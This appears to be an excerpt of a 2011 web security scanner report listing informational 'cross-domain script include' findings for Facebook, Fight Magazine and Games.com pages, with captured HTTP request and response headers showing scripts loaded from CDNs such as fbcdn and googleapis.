P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpatroyo; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.144.31
Connection: close
Date: Thu, 05 May 2011 11:42:38 GMT
Content-Length: 48049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.73. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.74. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.157.53
X-Cnection: close
Date: Thu, 05 May 2011 11:56:56 GMT
Content-Length: 44258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.75. http://www.facebook.com/people/Bucky-Jordan/100000824820783 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan/100000824820783

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bYeMg; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.110
X-Cnection: close
Date: Thu, 05 May 2011 02:50:59 GMT
Content-Length: 56884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.76. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

17.77. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/activity.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

17.78. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/comments.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

17.79. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.80. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.81. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.82. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.83. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.84. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.115
Connection: close
Date: Thu, 05 May 2011 10:56:43 GMT
Content-Length: 11326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.85. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.86. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/recommendations.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

17.87. http://www.facebook.com/plugins/send.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/send.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.88. http://www.facebook.com/plugins/send.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/send.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/send.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

17.89. http://www.facebook.com/policy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/policy.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.90. http://www.facebook.com/privacy/explanation.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/privacy/explanation.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.53
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 27769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Sxn9HcQx7-s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.91. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.92. http://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.93. http://www.facebook.com/robynalys previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/robynalys

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Frobynalys; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.29
Connection: close
Date: Thu, 05 May 2011 11:42:29 GMT
Content-Length: 47590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.94. http://www.facebook.com/share.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/share.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.25.111
Connection: close
Date: Thu, 05 May 2011 10:56:46 GMT
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.95. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.96. http://www.facebook.com/skdarealist previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/skdarealist

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.97. http://www.facebook.com/sportingnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sportingnews

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.98. http://www.facebook.com/stefanoboscolomarchi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/stefanoboscolomarchi

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.99. http://www.facebook.com/techcrunch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/techcrunch

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.100. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.101. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

17.102. http://www.facebook.com/theteebers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/theteebers

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.103. http://www.facebook.com/wmoppert previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/wmoppert

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.104. https://www.fightmagazine.com/mma-magazine/subscribe.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fightmagazine.com
Path:	/mma-magazine/subscribe.asp

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/prototype/1.7.0.0/prototype.js
https://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:57:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16739
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/navbar-s.css">

<script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/prototype/1.7.0.0/prototype.js'></script>
<script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...

17.105. http://www.games.com/browse-games/all/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.games.com
Path:	/browse-games/all/

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.adsonar.com/js/adsonar.js
http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/os/aol/jquery.getjs-1.0.min.js
http://o.aolcdn.com/os/games/scripts/initialize.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.aolshare.min.js
http://o.aolcdn.com/os_merge/?file=/games/scripts/jquery.min.js&file=/games/scripts/default.min.js&file=/header/js/jquery.globalheader-1.3.js&file=/header/js/jquery.globalsearchbox-1.3.js

Request

GET /browse-games/all/ HTTP/1.1
